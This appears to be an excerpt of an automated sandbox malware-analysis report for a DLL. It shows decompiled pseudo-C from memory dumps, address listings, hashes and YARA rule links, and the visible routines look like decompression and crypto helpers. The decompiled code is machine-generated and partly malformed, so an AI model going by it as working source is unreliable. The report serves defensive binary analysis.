				r10d =  *(_t907 + 0x98);
				r9d =  *(_t907 + 0x9c);
				_t852 =  *(_t907 + 0x90) ^ ( *(_t907 + 0x90) ^  *(_t907 + 0x68)) & _t747;
				r8d =  *(_t907 + 0xa0);
				 *(_t907 + 0x8c) = _t826;
				r11d = r11d ^ (r11d ^  *(_t907 + 0x6c)) & _t747;
				 *(_t907 + 0x104) = _t826;
				 *(_t907 + 0x90) = _t852;
				 *(_t907 + 0x94) = r11d;
				r10d = r10d ^ (r10d ^  *(_t907 + 0x70)) & _t747;
				 *(_t907 + 0xf8) = r15d;
				 *(_t907 + 0x98) = r10d;
				 *(_t907 + 0xfc) = r14d;
				r9d = r9d ^ (r9d ^  *(_t907 + 0x74)) & _t747;
				 *(_t907 + 0x100) = _t860;
				 *(_t907 + 0x9c) = r9d;
				 *(_t907 + 0x108) = _t852;
				r8d = r8d ^ (r8d ^  *(_t907 + 0x78)) & _t747;
				 *(_t907 + 0x10c) = r11d;
				 *(_t907 + 0xa0) = r8d;
				 *(_t907 + 0x110) = r10d;
				_t842 =  *(_t907 + 0xa4) ^ ( *(_t907 + 0xa4) ^  *(_t907 + 0x7c)) & _t747;
				 *(_t907 + 0x114) = r9d;
				 *(_t907 + 0xa4) = _t842;
				 *(_t907 + 0x11c) = _t842;
				 *(_t907 + 0x118) = r8d;
				0xf30eb380(_t906);
				E000007FE7FEF30EBAF0(_t868, _t907 + 0xa8, _t907 + 0xa8, _t907 + 0x80, _t919, _t920, _t921);
				return E000007FE7FEF30F1360(E000007FE7FEF30EC8C0(_t868,  *((intOrPtr*)(_t907 + 0x50)), _t907 + 0xa8, _t919, _t920, _t921), _t826,  *(_t907 + 0x168) ^ _t910);
			}

0x7fef30ea420
0x7fef30ea420
0x7fef30ea420
0x7fef30ea420
0x7fef30ea420
0x7fef30ea420
0x7fef30ea430
0x7fef30ea438
0x7fef30ea43f
0x7fef30ea449
0x7fef30ea450
0x7fef30ea458
0x7fef30ea45b
0x7fef30ea463
0x7fef30ea469
0x7fef30ea477
0x7fef30ea47c
0x7fef30ea483
0x7fef30ea487
0x7fef30ea48b
0x7fef30ea48e
0x7fef30ea492
0x7fef30ea497
0x7fef30ea49e
0x7fef30ea4a1
0x7fef30ea4aa
0x7fef30ea4b6
0x7fef30ea4bc
0x7fef30ea4c2
0x7fef30ea4c9
0x7fef30ea4c9
0x7fef30ea4cc
0x7fef30ea4d3
0x7fef30ea4da
0x7fef30ea4e1
0x7fef30ea4e8
0x7fef30ea4f5
0x7fef30ea4fb
0x7fef30ea4ff
0x7fef30ea503
0x7fef30ea50a
0x7fef30ea50e
0x7fef30ea515
0x7fef30ea519
0x7fef30ea520
0x7fef30ea527
0x7fef30ea52b
0x7fef30ea532
0x7fef30ea54b
0x7fef30ea551
0x7fef30ea554
0x7fef30ea557
0x7fef30ea55c
0x7fef30ea55f
0x7fef30ea562
0x7fef30ea567
0x7fef30ea569
0x7fef30ea56e
0x7fef30ea575
0x7fef30ea57b
0x7fef30ea57e
0x7fef30ea585
0x7fef30ea58c
0x7fef30ea58f
0x7fef30ea595
0x7fef30ea5a0
0x7fef30ea5a5
0x7fef30ea5a8
0x7fef30ea5b1
0x7fef30ea5b4
0x7fef30ea5ba
0x7fef30ea5c4
0x7fef30ea5c9
0x7fef30ea5cc
0x7fef30ea5d5
0x7fef30ea5d7
0x7fef30ea5dd
0x7fef30ea5e7
0x7fef30ea5eb
0x7fef30ea5ee
0x7fef30ea5f6
0x7fef30ea5f8
0x7fef30ea5fe
0x7fef30ea609
0x7fef30ea60d
0x7fef30ea610
0x7fef30ea618
0x7fef30ea61b
0x7fef30ea621
0x7fef30ea62c
0x7fef30ea631
0x7fef30ea634
0x7fef30ea63d
0x7fef30ea640
0x7fef30ea646
0x7fef30ea651
0x7fef30ea656
0x7fef30ea659
0x7fef30ea662
0x7fef30ea668
0x7fef30ea66b
0x7fef30ea673
0x7fef30ea67a
0x7fef30ea681
0x7fef30ea686
0x7fef30ea68c
0x7fef30ea693
0x7fef30ea696
0x7fef30ea69a
0x7fef30ea6a0
0x7fef30ea6aa
0x7fef30ea6af
0x7fef30ea6b2
0x7fef30ea6b9
0x7fef30ea6c2
0x7fef30ea6c4
0x7fef30ea6ca
0x7fef30ea6d0
0x7fef30ea6d4
0x7fef30ea6da
0x7fef30ea6e2
0x7fef30ea6e7
0x7fef30ea6ea
0x7fef30ea6f1
0x7fef30ea6f7
0x7fef30ea6f9
0x7fef30ea6ff
0x7fef30ea707
0x7fef30ea70b
0x7fef30ea70e
0x7fef30ea713
0x7fef30ea71a
0x7fef30ea720
0x7fef30ea728
0x7fef30ea72b
0x7fef30ea730
0x7fef30ea737
0x7fef30ea740
0x7fef30ea745
0x7fef30ea748
0x7fef30ea74d
0x7fef30ea750
0x7fef30ea756
0x7fef30ea75b
0x7fef30ea75e
0x7fef30ea765
0x7fef30ea76c
0x7fef30ea776
0x7fef30ea779
0x7fef30ea77c
0x7fef30ea77e
0x7fef30ea784
0x7fef30ea78d
0x7fef30ea791
0x7fef30ea794
0x7fef30ea797
0x7fef30ea79e
0x7fef30ea7a1
0x7fef30ea7a4
0x7fef30ea7af
0x7fef30ea7b3
0x7fef30ea7b6
0x7fef30ea7bc
0x7fef30ea7bf
0x7fef30ea7c6
0x7fef30ea7c8
0x7fef30ea7ce
0x7fef30ea7d8
0x7fef30ea7db
0x7fef30ea7de
0x7fef30ea7e2
0x7fef30ea7e4
0x7fef30ea7e9
0x7fef30ea7f2
0x7fef30ea7f6
0x7fef30ea7fa
0x7fef30ea7fc
0x7fef30ea800
0x7fef30ea803
0x7fef30ea816
0x7fef30ea81a
0x7fef30ea829
0x7fef30ea838
0x7fef30ea847
0x7fef30ea856
0x7fef30ea865
0x7fef30ea874
0x7fef30ea882
0x7fef30ea891
0x7fef30ea8a0
0x7fef30ea8b2
0x7fef30ea8c7
0x7fef30ea8dc
0x7fef30ea8ee
0x7fef30ea900
0x7fef30ea911
0x7fef30ea923
0x7fef30ea935
0x7fef30ea946
0x7fef30ea957
0x7fef30ea965
0x7fef30ea974
0x7fef30ea983
0x7fef30ea98f
0x7fef30ea99b
0x7fef30ea9a6
0x7fef30ea9b2
0x7fef30ea9be
0x7fef30ea9c9
0x7fef30ea9d4
0x7fef30ea9df
0x7fef30ea9e9
0x7fef30ea9f3
0x7fef30ea9fd
0x7fef30eaa07
0x7fef30eaa11
0x7fef30eaa1b
0x7fef30eaa2c
0x7fef30eaa36
0x7fef30eaa44
0x7fef30eaa47
0x7fef30eaa4c
0x7fef30eaa5c
0x7fef30eaa6a
0x7fef30eaa6f
0x7fef30eaa73
0x7fef30eaa77
0x7fef30eaa7c
0x7fef30eaa8c
0x7fef30eaa90
0x7fef30eaa9e
0x7fef30eaaa5
0x7fef30eaaa8
0x7fef30eaaac
0x7fef30eaab9
0x7fef30eaabd
0x7fef30eaac7
0x7fef30eaacd
0x7fef30eaad4
0x7fef30eaad8
0x7fef30eaae5
0x7fef30eaaec
0x7fef30eaaf2
0x7fef30eaaf9
0x7fef30eaafd
0x7fef30eab03
0x7fef30eab15
0x7fef30eab1c
0x7fef30eab22
0x7fef30eab32
0x7fef30eab41
0x7fef30eab50
0x7fef30eab5f
0x7fef30eab73
0x7fef30eab76
0x7fef30eab87
0x7fef30eab8b
0x7fef30eab8f
0x7fef30eabaf
0x7fef30eabc0
0x7fef30eabd1
0x7fef30eabd4
0x7fef30eabef
0x7fef30eabfe
0x7fef30eac0d
0x7fef30eac1c
0x7fef30eac2b
0x7fef30eac3a
0x7fef30eac49
0x7fef30eac58
0x7fef30eac67
0x7fef30eac76
0x7fef30eac7a
0x7fef30eac88
0x7fef30eac9b
0x7fef30eaca6
0x7fef30eacaf
0x7fef30eacb8
0x7fef30eacc1
0x7fef30eacca
0x7fef30eace1
0x7fef30eacea
0x7fef30eacf3
0x7fef30eacfc
0x7fef30ead05
0x7fef30ead0c
0x7fef30ead21
0x7fef30ead2d
0x7fef30ead31
0x7fef30ead3f
0x7fef30ead46
0x7fef30ead4d
0x7fef30ead54
0x7fef30ead67
0x7fef30ead6e
0x7fef30ead75
0x7fef30ead7c
0x7fef30ead83
0x7fef30ead87
0x7fef30ead92
0x7fef30ead9c
0x7fef30eada3
0x7fef30eadb4
0x7fef30eadcc
0x7fef30eade4
0x7fef30eadfc
0x7fef30eae14
0x7fef30eae2c
0x7fef30eae44
0x7fef30eae5c
0x7fef30eae74
0x7fef30eae92
0x7fef30eaea0
0x7fef30eaeab
0x7fef30eaeb2
0x7fef30eaebc
0x7fef30eaec3
0x7fef30eaec7
0x7fef30eaede
0x7fef30eaee0
0x7fef30eaeec
0x7fef30eaef5
0x7fef30eaefc
0x7fef30eaefe
0x7fef30eaf0d
0x7fef30eaf13
0x7fef30eaf16
0x7fef30eaf1f
0x7fef30eaf31
0x7fef30eaf38
0x7fef30eaf3b
0x7fef30eaf45
0x7fef30eaf51
0x7fef30eaf58
0x7fef30eaf5b
0x7fef30eaf64
0x7fef30eaf70
0x7fef30eaf76
0x7fef30eaf79
0x7fef30eaf82
0x7fef30eaf8e
0x7fef30eaf95
0x7fef30eaf97
0x7fef30eaf9e
0x7fef30eafa4
0x7fef30eafb1
0x7fef30eafb8
0x7fef30eafd2
0x7fef30eb010

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f883476ad5aa3f151d888b575c3e124faa9feb991a9f828fc328a0f3ea81589
Instruction ID: 2b2bb361633317393f89ccfb81fde4c1e4db29f472e2076e8ffaf9032f982908
Opcode Fuzzy Hash: 7f883476ad5aa3f151d888b575c3e124faa9feb991a9f828fc328a0f3ea81589
Instruction Fuzzy Hash: CE82AD73A142C18FD364CF78D981BDD7BE1F748358F14812AAB59DBA58DA38EA44CB04

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30DBE40 Relevance: .7, Instructions: 712COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53dff3674768893d55c25ad17f6837f93fcd80b24a083789a2dbc1218c2ea87f
Instruction ID: 33159d3802d8073dc2d3b42ae0b4e510ee61149f65d0d96619bb053a5ba988c2
Opcode Fuzzy Hash: 53dff3674768893d55c25ad17f6837f93fcd80b24a083789a2dbc1218c2ea87f
Instruction Fuzzy Hash: 1052CFB3B25A5595DB10CF1AE40579EB7A6F344BD8F098322DF9C43BA8DB38D0169340

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30E42A0 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efe52719ad2d49e45e6a90ae13fecbdebe465a2fb9215ad264ee0e107cb9f019
Instruction ID: 551fcaf28bcc16f21193779eebee77807f019579acc896f77dbfabcbf7bd1e16
Opcode Fuzzy Hash: efe52719ad2d49e45e6a90ae13fecbdebe465a2fb9215ad264ee0e107cb9f019
Instruction Fuzzy Hash: B03268B6B90A6596DB048F16E94138D7BA5F319BC8F898526DF8C83B54EB38E471D300

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF305F484 Relevance: .6, Instructions: 550
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E000007FE7FEF305F484() {
				unsigned int _t102;
				signed int _t103;
				short _t105;
				signed char _t108;
				unsigned int _t132;
				void* _t137;
				signed char _t156;
				signed char _t158;
				signed char _t165;
				signed char _t167;
				unsigned int _t169;
				signed char _t173;
				signed char _t174;
				intOrPtr _t184;
				intOrPtr _t185;
				signed int _t192;
				signed short _t195;
				signed int _t196;
				void* _t218;
				void* _t229;
				void* _t233;
				signed int _t235;
				signed long long _t249;
				unsigned long long _t255;
				signed long long _t258;
				signed long long _t259;
				void* _t262;
				signed long long _t265;
				unsigned long long _t274;
				void* _t287;
				void* _t288;
				void* _t290;
				signed long long _t291;
				void* _t296;
				signed long long _t298;
				void* _t301;
				signed long long _t303;
				void* _t306;
				long long _t307;
				long long _t310;
				void* _t311;
				signed long long _t312;
				intOrPtr _t313;
				void* _t316;
				signed long long _t319;
				void* _t320;
				signed char* _t321;
				signed char* _t322;
				signed char* _t325;
				signed long long _t327;

				_t184 =  *((intOrPtr*)(_t306 + 0x40));
				if (_t184 - _t290 + _t258 >= 0) goto 0xf305f561;
				if (_t249 - 0xf >= 0) goto 0xf305f601;
				_t262 = _t327 - _t316;
				if (_t262 - 1 > 0) goto 0xf305f608;
				_t156 =  *(_t306 + 0x38);
				_t102 =  *((short*)(_t311 + 0x1b7c + _t249 * 2));
				if (_t102 < 0) goto 0xf305f4ef;
				if ((_t102 & 0x0000ffff) - 0x200 < 0) goto 0xf305f52f;
				_t103 = _t102 >> 9;
				if (_t156 - _t103 < 0) goto 0xf305f52f;
				goto 0xf305f637;
				if (_t156 - 0xb < 0) goto 0xf305f52f;
				asm("dec eax");
				asm("adc eax, 0x0");
				if ( !_t103 - 0x23f > 0) goto 0xf3061218;
				_t105 =  *((short*)(_t311 + 0x237c + _t249 * 2));
				if (_t105 >= 0) goto 0xf305f526;
				_t15 = _t296 + 1; // 0xd
				_t137 = _t15;
				if (_t156 - 0xc >= 0) goto 0xf305f4f9;
				if (_t105 >= 0) goto 0xf305f637;
				if (_t316 == _t327) goto 0xf305f628;
				 *(_t306 + 0x30) =  *(_t306 + 0x30) | _t249 << _t156;
				 *(_t306 + 0x38) = _t262 + 8;
				_t218 = _t156 - 6;
				if (_t218 <= 0) goto 0xf305f4c4;
				goto 0xf305f639;
				if (_t218 != 0) goto 0xf3060736;
				if (_t137 - 0x121 >= 0) goto 0xf3061318;
				E000007FE7FEF30F1E10();
				if ( *(_t306 + 0x50) - 0x121 >= 0) goto 0xf306132c;
				if (_t184 - _t137 < 0) goto 0xf3061340;
				if (_t184 - 0x1c9 > 0) goto 0xf3061352;
				_t288 = _t287 - _t258;
				if (_t288 != _t290) goto 0xf3061366;
				E000007FE7FEF30F1E10();
				_t291 =  *((intOrPtr*)(_t306 + 0x58));
				 *((intOrPtr*)(_t291 + 0x1c)) =  *((intOrPtr*)(_t291 + 0x1c)) - 1;
				_t265 = _t291;
				_t108 = E000007FE7FEF3061920( *((intOrPtr*)(_t306 + 0xe8)), _t265, _t306 + 0x30, _t290, _t311);
				_t312 = _t291;
				r12d = _t108;
				_t310 = _t307;
				goto 0xf305f71f;
				goto 0xf305f639;
				_t158 = _t108;
				_t274 =  *(_t306 + 0x30) << _t158 |  *(_t306 + 0x30);
				 *(_t306 + 0x30) = _t274;
				 *(_t306 + 0x38) = _t108 + 0x10;
				goto 0xf305f639;
				_t319 = _t327;
				r12d =  *(_t306 + 0x7c);
				goto 0xf305f719;
				_t192 =  *((short*)(_t312 + 0x1b7c + _t265 * 2));
				if (_t192 < 0) goto 0xf305f65b;
				goto 0xf305f687;
				asm("dec eax");
				asm("adc esi, 0x0");
				if ( !(_t192 & 0x000001ff) - 0x23f > 0) goto 0xf3061207;
				_t195 =  *((short*)(_t312 + 0x237c + _t291 * 2));
				if (_t195 < 0) goto 0xf305f660;
				_t196 = _t195 & 0x0000ffff;
				if (0xa == 0) goto 0xf305f6c0;
				 *(_t306 + 0x30) = _t274 >> 0xb;
				 *(_t306 + 0x38) = _t158 - 0xb;
				 *(_t306 + 0x3c) = _t196;
				if (_t196 - 0x10 >= 0) goto 0xf305f6cb;
				_t229 = _t184 - 0x1c8;
				if (_t229 > 0) goto 0xf30612d7;
				 *((intOrPtr*)(_t312 + _t288 + 0x2921)) = sil;
				_t185 = _t184 + 1;
				 *((intOrPtr*)(_t306 + 0x40)) = _t185;
				goto 0xf305f70e;
				r12w = 0x2200;
				goto 0xf305f719;
				if (_t229 != 0) goto 0xf305f6d5;
				if (_t185 == 0) goto 0xf305f70e;
				 *((long long*)(_t306 + 0x80)) = 0x2;
				 *((intOrPtr*)(_t306 + 0x88)) = 7;
				if (0x2fffffff2 - 2 > 0) goto 0xf30612e8;
				 *((intOrPtr*)(_t306 + 0x44)) =  *((intOrPtr*)(_t306 + 0xc00000048));
				r12d = 0xb01;
				r12d = r12d & 0x00001f00;
				r12d = r12d | 1;
				if (r12b == 0) goto E000007FE7FEF305F484;
				_t233 = (r12b & 0xffffffff) - 1;
				if (_t233 == 0) goto 0xf30606d0;
				_t165 =  *(_t306 + 0x38);
				_t298 = _t319;
				if (_t233 >= 0) goto 0xf3060496;
				if (_t298 == _t327) goto 0xf305f77d;
				_t259 = _t258 << _t165;
				 *(_t306 + 0x30) =  *(_t306 + 0x30) | _t259;
				 *(_t306 + 0x38) = _t165 + 8;
				_t320 = _t298 + 1;
				goto 0xf305f782;
				_t235 =  *(_t306 + 0x50) & 0x00000002;
				if (_t235 == 0) goto 0xf305f74e;
				_t167 =  *(_t306 + 0x38);
				_t301 = _t320;
				if (_t235 >= 0) goto 0xf30604be;
				if (_t301 == _t327) goto 0xf305f7cf;
				 *(_t306 + 0x30) =  *(_t306 + 0x30) | _t259 << _t167;
				 *(_t306 + 0x38) = _t167 + 8;
				_t321 = _t301 + 1;
				goto 0xf305f7d4;
				_t303 = _t327;
				if (( *(_t306 + 0x50) & 0x00000002) == 0) goto 0xf305f7a0;
				if (_t321 == _t327) goto 0xf30611fa;
				_t322 =  &(_t321[1]);
				 *(_t312 + 0xc) =  *_t321 & 0x000000ff;
				r12b = 2;
				 *((long long*)(_t306 + 0x70)) = _t310;
				_t124 =  *(_t306 + 0x1b8);
				_t169 =  *(_t312 + 0xc);
				r8d = _t169;
				r8d = r8d << 8;
				r10d = _t169;
				r10d = r10d & 0x0000000f;
				r11b =  *(_t306 + 0x100) >> ((_t169 >> 0x00000004) + 0x00000008 & 0x0000003f) == 0;
				r11b = r11b & ( *(_t306 + 0x1b8) & 0xffffff00 | (_t124 & 0x00000004) == 0x00000000);
				r12d =  *(_t306 + 0x50);
				if (_t322 == _t327) goto 0xf305f8b8;
				r9d =  *_t322 & 0x000000ff;
				_t130 =  !=  ? 0x1c01 : 0x301;
				r12d = 0x1c01;
				if (r11b != 0) goto 0xf305f89e;
				r12d =  !=  ? 0x1c01 : 0x301;
				 *( *((intOrPtr*)(_t306 + 0x58)) + 0x10) = r9d;
				r12d =  >=  ? 0x1c01 : r12d;
				if (r12b == 0) goto 0xf305f83f;
				_t132 = r12b & 0xffffffff;
				if (_t132 != 1) goto 0xf3060ba4;
				r12d = r12d >> 8;
				_t325 =  &(_t322[1]);
				_t313 =  *((intOrPtr*)(_t306 + 0x58));
				_t173 =  *(_t306 + 0x38);
				if (_t173 - 3 >= 0) goto 0xf305f93d;
				if (_t325 == _t327) goto 0xf305f92c;
				_t255 =  *(_t306 + 0x30) | _t303 << _t173;
				 *(_t306 + 0x30) = _t255;
				_t174 = _t173 + 8;
				 *(_t306 + 0x38) = _t174;
				r12d = 0;
				goto 0xf305f932;
				r12d =  *(_t306 + 0x50);
				if ((r12b & 0x00000002) == 0) goto 0xf305f902;
				goto 0xf305fa58;
				 *(_t306 + 0x30) = _t255 >> 3;
				 *(_t306 + 0x38) = _t174 + 0xfffffffd;
				 *(_t313 + 0x18) = _t132 & 0x00000001;
				 *(_t313 + 0x1c) = _t132 >> 0x00000001 & 0x00000003;
				goto __rax;
			}

0x7fef305f484
0x7fef305f495
0x7fef305f4a3
0x7fef305f4ac
0x7fef305f4b7
0x7fef305f4c2
0x7fef305f4cb
0x7fef305f4d6
0x7fef305f4e1
0x7fef305f4e3
0x7fef305f4e8
0x7fef305f4ea
0x7fef305f4f2
0x7fef305f4fe
0x7fef305f502
0x7fef305f50a
0x7fef305f510
0x7fef305f51b
0x7fef305f51d
0x7fef305f51d
0x7fef305f524
0x7fef305f529
0x7fef305f532
0x7fef305f545
0x7fef305f54d
0x7fef305f551
0x7fef305f556
0x7fef305f55c
0x7fef305f561
0x7fef305f56d
0x7fef305f589
0x7fef305f594
0x7fef305f59c
0x7fef305f5a8
0x7fef305f5ae
0x7fef305f5b4
0x7fef305f5d1
0x7fef305f5d6
0x7fef305f5db
0x7fef305f5e3
0x7fef305f5e6
0x7fef305f5eb
0x7fef305f5ee
0x7fef305f5f9
0x7fef305f5fc
0x7fef305f606
0x7fef305f60c
0x7fef305f611
0x7fef305f61a
0x7fef305f622
0x7fef305f626
0x7fef305f628
0x7fef305f62b
0x7fef305f632
0x7fef305f641
0x7fef305f64c
0x7fef305f659
0x7fef305f662
0x7fef305f666
0x7fef305f66f
0x7fef305f675
0x7fef305f682
0x7fef305f684
0x7fef305f689
0x7fef305f68e
0x7fef305f695
0x7fef305f699
0x7fef305f6a0
0x7fef305f6a2
0x7fef305f6a8
0x7fef305f6ae
0x7fef305f6b6
0x7fef305f6b8
0x7fef305f6be
0x7fef305f6c4
0x7fef305f6c9
0x7fef305f6cb
0x7fef305f6d3
0x7fef305f6df
0x7fef305f6e7
0x7fef305f6fc
0x7fef305f706
0x7fef305f70e
0x7fef305f712
0x7fef305f71c
0x7fef305f722
0x7fef305f72c
0x7fef305f72f
0x7fef305f743
0x7fef305f747
0x7fef305f752
0x7fef305f75b
0x7fef305f761
0x7fef305f76a
0x7fef305f772
0x7fef305f778
0x7fef305f77b
0x7fef305f782
0x7fef305f785
0x7fef305f795
0x7fef305f799
0x7fef305f7a4
0x7fef305f7ad
0x7fef305f7bc
0x7fef305f7c4
0x7fef305f7ca
0x7fef305f7cd
0x7fef305f7cf
0x7fef305f7d7
0x7fef305f7e1
0x7fef305f7eb
0x7fef305f7ee
0x7fef305f7f2
0x7fef305f7fa
0x7fef305f7ff
0x7fef305f80b
0x7fef305f80f
0x7fef305f812
0x7fef305f816
0x7fef305f82d
0x7fef305f834
0x7fef305f838
0x7fef305f842
0x7fef305f848
0x7fef305f850
0x7fef305f88e
0x7fef305f893
0x7fef305f899
0x7fef305f89b
0x7fef305f8a9
0x7fef305f8ad
0x7fef305f8be
0x7fef305f8c4
0x7fef305f8d3
0x7fef305f8d9
0x7fef305f8dd
0x7fef305f8e0
0x7fef305f8f6
0x7fef305f905
0x7fef305f90a
0x7fef305f915
0x7fef305f918
0x7fef305f91d
0x7fef305f920
0x7fef305f924
0x7fef305f92a
0x7fef305f92f
0x7fef305f936
0x7fef305f938
0x7fef305f944
0x7fef305f94c
0x7fef305f955
0x7fef305f95e
0x7fef305f979

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4902395ec22f6165324908bccdde13bc784c3548e08ab8dc389ccd8982fedf92
Instruction ID: 931615abbbc220fbc6760d0cd51fad33b6f8532fba87af4c1c20d58a9956060e
Opcode Fuzzy Hash: 4902395ec22f6165324908bccdde13bc784c3548e08ab8dc389ccd8982fedf92
Instruction Fuzzy Hash: 5A32EB72B0C2968AE7E48B19E4447BA77D6F384794F144237DA8D57BE8DA3CE441EB00

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30E8D40 Relevance: .5, Instructions: 519
COMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E000007FE7FEF30E8D40(long long __rbx, void* __rcx, signed char* __rdx, long long __rdi, long long __rsi, void* __r8, void* __r9) {
				void* __rbp;
				void* _t425;
				void* _t427;
				signed char _t428;
				signed char _t430;
				signed char _t432;
				signed char _t434;
				signed char _t436;
				signed char _t438;
				signed char _t440;
				signed char _t442;
				signed char _t444;
				signed char _t446;
				signed char _t448;
				signed char _t450;
				signed char _t452;
				signed char _t454;
				signed char _t456;
				signed char _t458;
				signed char _t460;
				signed char _t462;
				signed char _t464;
				signed char _t466;
				signed char _t468;
				signed char _t470;
				signed char _t472;
				signed char _t474;
				signed char _t476;
				signed char _t478;
				unsigned char _t480;
				signed char _t482;
				signed char _t484;
				signed char _t486;
				signed char _t488;
				unsigned char _t490;
				signed char _t493;
				signed char _t497;
				signed char _t501;
				signed char _t505;
				signed char _t509;
				signed char _t513;
				signed char _t517;
				signed char _t521;
				signed char _t525;
				signed char _t529;
				signed char _t533;
				signed char _t537;
				signed char _t541;
				signed char _t545;
				signed char _t549;
				signed char _t553;
				signed char _t557;
				signed char _t561;
				signed char _t565;
				signed char _t569;
				signed long long _t584;
				signed long long _t585;
				void* _t587;
				void* _t658;
				signed long long _t659;
				void* _t687;
				void* _t688;
				void* _t690;
				void* _t694;
				void* _t696;
				void* _t698;

				_t653 = __rsi;
				_t649 = __rdi;
				 *((long long*)(_t658 + 0x10)) = __rbx;
				 *((long long*)(_t658 + 0x18)) = __rsi;
				 *((long long*)(_t658 + 0x20)) = __rdi;
				_t656 = _t658 - 0x110;
				_t659 = _t658 - 0x210;
				_t584 =  *0xf319c428; // 0x2fa980d671f5
				_t585 = _t584 ^ _t659;
				 *(_t658 - 0x110 + 0x100) = _t585;
				_t587 = __rcx;
				_t428 =  *__rdx & 0x000000ff;
				 *(_t659 + 0x21) = _t428 >> 4;
				_t430 = __rdx[1] & 0x000000ff;
				 *(_t659 + 0x20) = _t428 & 0xf;
				 *(_t659 + 0x23) = _t430 >> 4;
				_t432 = __rdx[2] & 0x000000ff;
				 *(_t659 + 0x22) = _t430 & 0xf;
				 *(_t659 + 0x25) = _t432 >> 4;
				_t434 = __rdx[3] & 0x000000ff;
				 *(_t659 + 0x24) = _t432 & 0xf;
				 *(_t659 + 0x27) = _t434 >> 4;
				_t436 = __rdx[4] & 0x000000ff;
				 *(_t659 + 0x26) = _t434 & 0xf;
				 *(_t659 + 0x29) = _t436 >> 4;
				_t438 = __rdx[5] & 0x000000ff;
				 *(_t659 + 0x28) = _t436 & 0xf;
				 *(_t659 + 0x2b) = _t438 >> 4;
				_t440 = __rdx[6] & 0x000000ff;
				 *(_t659 + 0x2a) = _t438 & 0xf;
				 *(_t659 + 0x2d) = _t440 >> 4;
				_t442 = __rdx[7] & 0x000000ff;
				 *(_t659 + 0x2c) = _t440 & 0xf;
				 *(_t659 + 0x2f) = _t442 >> 4;
				_t444 = __rdx[8] & 0x000000ff;
				 *(_t659 + 0x2e) = _t442 & 0xf;
				 *(_t659 + 0x31) = _t444 >> 4;
				_t446 = __rdx[9] & 0x000000ff;
				 *(_t659 + 0x30) = _t444 & 0xf;
				 *(_t659 + 0x33) = _t446 >> 4;
				_t448 = __rdx[0xa] & 0x000000ff;
				 *(_t659 + 0x32) = _t446 & 0xf;
				 *(_t659 + 0x35) = _t448 >> 4;
				_t450 = __rdx[0xb] & 0x000000ff;
				 *(_t659 + 0x34) = _t448 & 0xf;
				 *(_t659 + 0x37) = _t450 >> 4;
				_t452 = __rdx[0xc] & 0x000000ff;
				 *(_t659 + 0x36) = _t450 & 0xf;
				 *(_t659 + 0x39) = _t452 >> 4;
				_t454 = __rdx[0xd] & 0x000000ff;
				 *(_t659 + 0x38) = _t452 & 0xf;
				 *(_t659 + 0x3b) = _t454 >> 4;
				_t456 = __rdx[0xe] & 0x000000ff;
				 *(_t659 + 0x3a) = _t454 & 0xf;
